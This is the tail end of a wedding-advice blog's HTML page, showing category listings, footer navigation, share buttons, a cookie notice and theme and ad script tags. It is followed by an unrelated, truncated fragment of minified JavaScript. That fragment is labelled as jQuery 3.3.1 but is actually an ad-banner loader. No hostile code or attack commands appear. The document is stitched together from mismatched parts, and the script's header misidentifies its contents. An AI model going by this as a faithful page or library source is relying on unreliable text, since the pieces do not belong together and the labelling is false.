https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" title="Permalink to Everything You Need to Know About 2019 Wedding Trends" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">69</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/questions-answered/" title="Permalink to " rel="bookmark"> Questions Answered </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/tips-for-moving-in-together-after-the-wedding/" title="Permalink to Tips For Moving In Together After The Wedding" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/03/moving-in-after-wedding.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/qa-should-you-worry-about-buying-your-wedding-band-online/" title="Permalink to [Q&#038;A] Should You Worry About Buying Your Wedding Band Online?" rel="bookmark" style="background-image: url( https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/buying-wedding-bands-online.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/3-tips-for-hosting-the-perfect-second-wedding-outdoor-reception/" title="Permalink to 3 Tips for Hosting the Perfect Second Wedding Outdoor Reception" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/outdoor-wedding.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">11</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/religious-issues/" title="Permalink to " rel="bookmark"> Religious Issues </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/marriage-convalidation-2/" title="Permalink to Marriage Convalidation" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/sweettreats.com-5.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/sample-vow-renewal-script/" title="Permalink to Sample Vow Renewal Script" rel="bookmark" style="background-image: url( https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2014/11/Screen-Shot-2014-11-03-at-9.55.32-PM.png?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/religious-vow-renewal-ceremony-sample-script-ceremony/" title="Permalink to Religious Vow Renewal Ceremony &#8211; Sample Script &#038; Ceremony" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2014/07/bab900bce75ed2b5be2e0d24561b9796.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">126</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/second-wedding-2/" title="Permalink to " rel="bookmark"> Second Wedding </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/how-to-make-your-vow-renewal-extra-special/" title="Permalink to How to Make Your Vow Renewal Extra Special" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/12/wedding-renewl.jpeg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/save-money-on-your-second-wedding-10-great-ideas/" title="Permalink to Save Money on Your Second Wedding: 10 Great Ideas" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/11/second-wedding-saving-money.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/five-fabulous-ideas-for-the-vow-renewal-of-your-dreams/" title="Permalink to Five Fabulous Ideas For The Vow Renewal Of Your Dreams" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/vow-renewal-header.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">311</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/wedding-attire/" title="Permalink to " rel="bookmark"> Wedding Attire </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" title="Permalink to 21 Princess Ball Gown Wedding Dresses for the Modern Bride" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/three-piece-suits-perfect-for-your-dashing-groom/" title="Permalink to Three-Piece Suits Perfect for Your Dashing Groom" rel="bookmark" style="background-image: url( https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/3Piece-Groom-Suit-02.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/not-wear-wedding-guys/" title="Permalink to What Not to Wear to a Wedding For Guys" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/10/man-in-suit-with-necktie-tieclip-and-ring-1600.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">178</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="Permalink to " rel="bookmark"> Wedding Planning </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/top-7-locations-for-a-wedding-abroad/" title="Permalink to Top 7 Locations for a Wedding Abroad" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/21-ways-you-can-make-your-wedding-a-stand-out-affair/" title="Permalink to 21 Ways You Can Make Your Wedding a Stand-Out Affair" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/how-to-have-a-standout-wedding.jpg?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> <li class="vw-category-list__item vw-category-list__item--show-count vw-category-list__item--no-title clearfix"> <div class="vw-category-list__count">101</div> <h3 class="vw-category-list__title"> <a href="https://www.idotaketwo.com/blog/category/wedding-vows-ceremonies/" title="Permalink to " rel="bookmark"> Wedding Vows &amp; Ceremonies </a> </h3> <div class="vw-category-posts"> <a href="https://www.idotaketwo.com/blog/four-ways-creatively-involve-children-mixed-family-wedding/" title="Permalink to Four Ways to Creatively Involve Children in a Mixed Family Wedding" rel="bookmark" style="background-image: url( https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2017/08/9dff50fd111708519e778c6385e51747.jpg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/forever-ever-celebrate-lasting-love-renewing-vows/" title="Permalink to Forever and Ever: Celebrate Lasting Love By Renewing Your Vows" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/pexels-photo-67511.jpeg?resize=150%2C83&#038;ssl=1 );"> </a> <a href="https://www.idotaketwo.com/blog/whats-trending-weddings-2017/" title="Permalink to What’s Trending in Weddings in 2017?" rel="bookmark" style="background-image: url( https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/Trend-Report-cover-2017.png?resize=150%2C83&#038;ssl=1 );"> </a> </div> </li> </ul></div><div id="text-60" class="widget widget_text"> <div class="textwidget"></div> </div></div> </div> </div> </div> </section></div> <footer class="vw-footer" itemscope itemtype="https://schema.org/WPFooter" > <!-- Bottom Bar: Default --> <div class="vw-bottom-bar vw-bottom-bar--default vw-bar"> <div class="container"> <div class="vw-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <div class="vw-copyright">Copyright &copy;, All Rights Reserved</div> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <!-- Bottom Menu --> <nav class="vw-menu-bottom"> <ul id="menu-footer" class="vw-menu vw-menu-type-text clearfix"><li id="menu-item-3788" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3788 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/homepage/" class=" menu-link main-menu-link"><span>Homepage</span></a></li> <li id="menu-item-3786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3786 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/about-us-2/" class=" menu-link main-menu-link"><span>About Us</span></a></li> <li id="menu-item-3790" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3790 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/submit-wedding-or-vows/" class=" menu-link main-menu-link"><span>Submit Wedding or Vows</span></a></li> <li id="menu-item-3789" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3789 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/privacy-policy/" class=" menu-link main-menu-link"><span>Privacy Policy</span></a></li> <li id="menu-item-9533" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9533 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/terms-of-use/" class=" menu-link main-menu-link"><span>Terms of Use</span></a></li> </ul></nav> <!-- End Bottom Menu --> </div> </div> </div> </div> <!-- End bottom Bar --> </footer> </div> <div class="vw-side-panel__backdrop"> <div class="vw-side-panel_close"><i class="vw-icon icon-entypo-cancel"></i></div> </div> <div class="vw-side-panel vw-disable-inview"> <div class="vw-side-panel__socials vw-icon-solid"> <span class="vw-site-social-links vw-social-icons"> <a class="vw-social-icon vw-icon-social-facebook vw-social-icon--medium" rel="author" href="https://www.facebook.com/pages/Idotaketwocom/157279667807124" title="Facebook" target="_blank"> <i class="vw-icon icon-social-facebook"></i> <span class="vw-social-icon__label">Facebook</span> </a> <a class="vw-social-icon vw-icon-social-gplus vw-social-icon--medium" rel="author" href="https://plus.google.com/u/5/b/105220780787588888304/105220780787588888304/" title="Google+" target="_blank"> <i class="vw-icon icon-social-gplus"></i> <span class="vw-social-icon__label">Google+</span> </a> <a class="vw-social-icon vw-icon-social-pinterest vw-social-icon--medium" rel="author" href="http://pinterest.com/weddingqueen/" title="Pinterest" target="_blank"> <i class="vw-icon icon-social-pinterest"></i> <span class="vw-social-icon__label">Pinterest</span> </a> <a class="vw-social-icon vw-icon-social-rss vw-social-icon--medium" rel="author" href="http://www.idotaketwo.com/blog/feed/" title="RSS" target="_blank"> <i class="vw-icon icon-social-rss"></i> <span class="vw-social-icon__label">RSS</span> </a> <a class="vw-social-icon vw-icon-social-twitter vw-social-icon--medium" rel="author" href="https://twitter.com/IDoTakeTwo" title="Twitter" target="_blank"> <i class="vw-icon icon-social-twitter"></i> <span class="vw-social-icon__label">Twitter</span> </a> </span> </div> <div class="vw-side-panel__menu"> <h3 class="vw-side-panel__menu-title">MENU</h3> <div class="vw-side-panel__main-menu"> <!-- Mobile Menu --> <nav class="vw-menu-mobile"> <ul id="menu-main-menu-1" class="vw-menu vw-menu-type-text clearfix"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-has-children menu-item-5644 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="http://www.idotaketwo.com/blog/home/" aria-current="page" class=" menu-link main-menu-link"><span>Wedding Guides</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5645 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/vow-renewal-etiquette-2/" class=" menu-link sub-menu-link"><span>Vow Renewal Etiquette</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5646 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-marriage-ceremomy-2/" class=" menu-link sub-menu-link"><span>Second Marriage Ceremony</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5653 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dress-2/" class=" menu-link sub-menu-link"><span>Second Wedding Dress</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5654 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/dresses-for-vow-renewal/" class=" menu-link sub-menu-link"><span>Vow Renewal Dress</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5655 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/wedding-etiquette-advice-2/" class=" menu-link sub-menu-link"><span>Second Wedding Etiquette</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5656 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/children-involvement-in-wedding-ceremonies/" class=" menu-link sub-menu-link"><span>Children &#038; Weddings</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5657 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wedding-invitations-2/" class=" menu-link sub-menu-link"><span>Second Wedding Invitation Etiquette</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5658 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wedding-toasts-wedding-speeches-2/" class=" menu-link sub-menu-link"><span>Toasts &#038; Wedding Speeches</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5659 menu-item-depth-1 sub-menu-item"><a href="http://idotaketwo.com/blog/wording-second-wedding-invitations-examples-samples-2/" class=" menu-link sub-menu-link"><span>Second Wedding Speeches Example</span></a></li> </ul> </div> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-5492 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/wedding-attire/" class=" menu-link main-menu-link"><span>Dresses</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5680 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dress-2/" class=" menu-link sub-menu-link"><span>Second Wedding Dress</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5681 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/wedding-attire-dresses-for-vow-renewals/" class=" menu-link sub-menu-link"><span>Vow Renewal Dress</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5682 menu-item-depth-1 sub-menu-item"><a href="http://www.idotaketwo.com/blog/second-wedding-dresses-for-an-older-still-sexy-bride/" class=" menu-link sub-menu-link"><span>Dresses for An Older (&#038; Still Sexy) Bride</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5683 menu-item-depth-1 sub-menu-item"><a href="https://www.idotaketwo.com/blog/category/wedding-attire/" class=" menu-link sub-menu-link"><span>Top Wedding Dress Posts</span></a></li> </ul> </div> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5488 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/category/second-wedding-2/" class=" menu-link main-menu-link"><span>Second Wedding</span></a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5494 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.idotaketwo.com/blog/category/wedding-vows-ceremonies/" class=" menu-link main-menu-link"><span>Vows Renewal</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-152 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="http://www.top10weddingsites.com/" class=" menu-link main-menu-link"><span>Top 10 Lists</span></a><div class="sub-menu-wrapper"> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5647 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-invitation-ideas.html" class=" menu-link sub-menu-link"><span>Wedding Invitation Sites</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5648 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-blogs.html" class=" menu-link sub-menu-link"><span>Top Wedding Blogs</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5649 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-website-tools.html" class=" menu-link sub-menu-link"><span>Wedding Website Tools</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5650 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-magazines.html" class=" menu-link sub-menu-link"><span>Top Wedding Magazines</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8616 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/wedding-favors.html" class=" menu-link sub-menu-link"><span>Top Wedding Favor Stores</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5651 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/finding-wedding-music.html" class=" menu-link sub-menu-link"><span>Top Wedding Music Lists</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5652 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/retail-wedding-registries.html" class=" menu-link sub-menu-link"><span>Top Wedding Registries</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8617 menu-item-depth-1 sub-menu-item"><a href="http://www.top10weddingsites.com/etsy.html" class=" menu-link sub-menu-link"><span>Top Etsy Wedding Ideas</span></a></li> </ul> </div> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8585 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/etiquette-planning/" class=" menu-link main-menu-link"><span>Etiquette &#038; Planning</span></a><div class="sub-menu-wrapper"><div class="sub-menu-wrapper"><div class="sub-menu-wrapper"></div> </li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8586 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--latest"><a href="https://www.idotaketwo.com/blog/category/inspiration/" class=" menu-link main-menu-link"><span>Inspiration</span></a><div class="sub-menu-wrapper"><div class="sub-menu-wrapper"><div class="sub-menu-wrapper"></div> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6025 menu-item-depth-0 main-menu-item vw-mega-item vw-mega-item--default"><a href="https://www.oncewed.com/used-wedding-dresses/" class=" menu-link main-menu-link"><span>Used Wedding Dresses</span></a></li> </ul> </nav> <!-- End Mobile Menu --> </div> <div class="vw-side-panel__sub-menu"> <div class="vw-side-panel__close-sub-menu"><span><i class="vw-icon icon-entypo-left-open"></i> Back</span></div> <div class="vw-menu-mobile"></div> </div> </div> </div> <script type="text/javascript" src="//s.skimresources.com/js/94002X1548716.skimlinks.js"></script> <aside id="mashfs-main" class="mashfs-hide mashfs-left" style="background-color: transparent; margin-left:0px; margin-right:0px;"><div class="mashfs-buttons"><div id="mashfs-total-shares" style="color: #5a5a5f;"><span id="mashfs-count">127</span> SHARES</div><a href="http://www.facebook.com/sharer.php?u=https://www.idotaketwo.com/blog/home/" class="mashicon-facebook mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="https://twitter.com/intent/tweet?text=Home&url=https://www.idotaketwo.com/blog/home/" class="mashicon-twitter mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a data-mashsb-url="https://pinterest.com/pin/create/button/?url=https://www.idotaketwo.com/blog/home/&media=&description=Second+Wedding+Ideas+for+Your+Remarriage.++Everything+You+Need+To+Know+About+Second+Weddings%2C+Remarriage%2C+Second+Marriages+and+Vow+Renewals.++There+are+a+lot+of+things+that+are+actually+kind+of+fantastic+the+second+time+around%2C+not" href="#" class="mashicon-pinterest mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="http://www.reddit.com/submit?url=https://www.idotaketwo.com/blog/home/&title=Second%20Wedding%2C%20Remarriage%2C%20Second%20Marriages%2C%20%26%20Vow%20Renewal" class="mashicon-reddit mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="http://www.stumbleupon.com/submit?url=https://www.idotaketwo.com/blog/home/" class="mashicon-stumbleupon mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="https://bufferapp.com/add?url=https://www.idotaketwo.com/blog/home/&text=Second%20Wedding%2C%20Remarriage%2C%20Second%20Marriages%2C%20%26%20Vow%20Renewal" class="mashicon-buffer mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="https://getpocket.com/save?title=Second%20Wedding%2C%20Remarriage%2C%20Second%20Marriages%2C%20%26%20Vow%20Renewal&url=https://www.idotaketwo.com/blog/home/" class="mashicon-pocket mashfs-popup-share" style="margin-bottom: 0px;" target="_blank" rel="external nofollow"><span class="icon"></span></a><a href="#" id="mashfs-hidebtn" style="background-color: transparent;color: #5a5a5f;"></a></div></aside> <span class="vw-scroll-to-top"><i class="vw-icon icon-entypo-up-open-big"></i></span> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20190201'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var ctcc_vars = {"expiry":"30","method":"1","version":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/uk-cookie-consent/assets/js/uk-cookie-consent-js.js?ver=2.3.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var instant_search = {"blog_url":"https:\/\/www.idotaketwo.com\/blog\/","ajax_url":"https:\/\/www.idotaketwo.com\/blog\/wp-admin\/admin-ajax.php","placeholder":"Search"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/inc/instant-search/instant-search.js?ver=3.3.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/SmoothScroll.js?ver=1.4.6'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/jquery.hoverIntent.js?ver=1.8.1'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/jquery.fitvids.js?ver=1.1.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/perfect-scrollbar.js?ver=0.6.13'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/isotope.pkgd.min.js?ver=3.0.1'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/packery-mode.pkgd.min.js?ver=2.0.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/jquery.easing.compatibility.js?ver=1.3'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/jquery.magnific-popup.js?ver=1.1.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/jquery-superfish/superfish.js?ver=1.7.9'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/theia-sticky-sidebar.js?ver=1.5.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/waypoint/jquery.waypoints.js?ver=4.0.1'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/waypoint/shortcuts/inview.js?ver=4.0.1'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/waypoint/shortcuts/sticky.js?ver=4.0.1'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/slick/slick.js?ver=1.6.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var vw_main_js = {"is_rtl":"","translation_next":"Next","translation_previous":"Previous","theme_path":"http:\/\/www.idotaketwo.com\/blog\/wp-content\/themes\/presso","ajaxurl":"https:\/\/www.idotaketwo.com\/blog\/wp-admin\/admin-ajax.php","slider_slide_duration":"4000","slider_transition_speed":"300","accent_color":"#ff5c5c"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/main.js?ver=3.3.0'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/effect-fade.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/themes/presso/js/shortcodes.js?ver=3.3.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpgdprcData = {"ajaxURL":"https:\/\/www.idotaketwo.com\/blog\/wp-admin\/admin-ajax.php","ajaxSecurity":"80f88a9c70","consentVersion":"1","consentStatus":"0","isMultisite":"","path":"\/","blogId":""}; /* ]]> */ </script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-content/plugins/wp-gdpr-compliance/assets/js/front.js?ver=1557406090'></script> <script type='text/javascript' src='http://www.idotaketwo.com/blog/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'89085497',post:'938',tz:'-4',srv:'www.idotaketwo.com'} ]); _stq.push([ 'clickTrackerInit', '89085497', '938' ]); </script> <script type="text/javascript"> jQuery(document).ready(function($){ if(!catapultReadCookie("catAccCookies")){ // If the cookie has not been set then show the bar $("html").addClass("has-cookie-bar"); $("html").addClass("cookie-bar-bottom-bar"); $("html").addClass("cookie-bar-bar"); } $(window).scroll(function(){ var scroll = $(window).scrollTop(); if ( scroll > 200 ) { ctccCloseNotification(); } }); ctccFirstPage(); }); </script> <div id="catapult-cookie-bar" class=""><div class="ctcc-inner "><span class="ctcc-left-side">This website uses cookies to ensure you get the best experience on our website. By continuing to use this site you agree to these cookies. <a class="ctcc-more-info-link" tabindex=0 target="_blank" href="https://www.idotaketwo.com/blog/privacy-policy/">Learn More</a></span><span class="ctcc-right-side"><button id="catapultCookie" tabindex=0 onclick="catapultAcceptCookies();">Okay, thanks</button></span></div><!-- custom wrapper class --></div><!-- #catapult-cookie-bar --> <script type="text/javascript" class="teads" async="true" src="//a.teads.tv/page/13632/tag"></script> <script src="https://www.dwin2.com/pub.203311.min.js"></script> </body> </html>
0
/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */ function _extends(){return(_extends=Object.assign||function(n){for(var i,r,t=1;t<arguments.length;t++){i=arguments[t];for(r in i)Object.prototype.hasOwnProperty.call(i,r)&&(n[r]=i[r])}return n}).apply(this,arguments)}function __add_banner(n){AD_DATA[AD_DATA.length]=n}function __load_banners(){var n=new String,t,i;if(AD_DATA.length>0){for(t=0;t<AD_DATA.length;t++)i=AD_DATA[t],n=n+"|"+i.type+"|"+i.id+"|"+i.output;n=n.substring(1,n.length),function(t,i,r){if(!t.getElementById(r)){var u,f=t.getElementsByTagName(i)[t.getElementsByTagName(i).length-1];u=t.createElement(i);u.id=r;u.async=!0;u.src="/cache.aspx?_path="+AD_ROOT_PATH+"banner/&mod=lazy&data="+n;f.parentNode.appendChild(u)}}(document,"script","realclickjs")}}function __getEL(n){return document.getElementById(n)}function __setRootPath(n){AD_ROOT_PATH=n==""||n==null?"/":n;AD_ROOT_PATH.lastIndexOf("/")<AD_ROOT_PATH.length-1&&(AD_ROOT_PATH+="/")}function __hostName(){var n=location.host;return n==""||n==null?"":n.toLowerCase()}function __pathName(){var 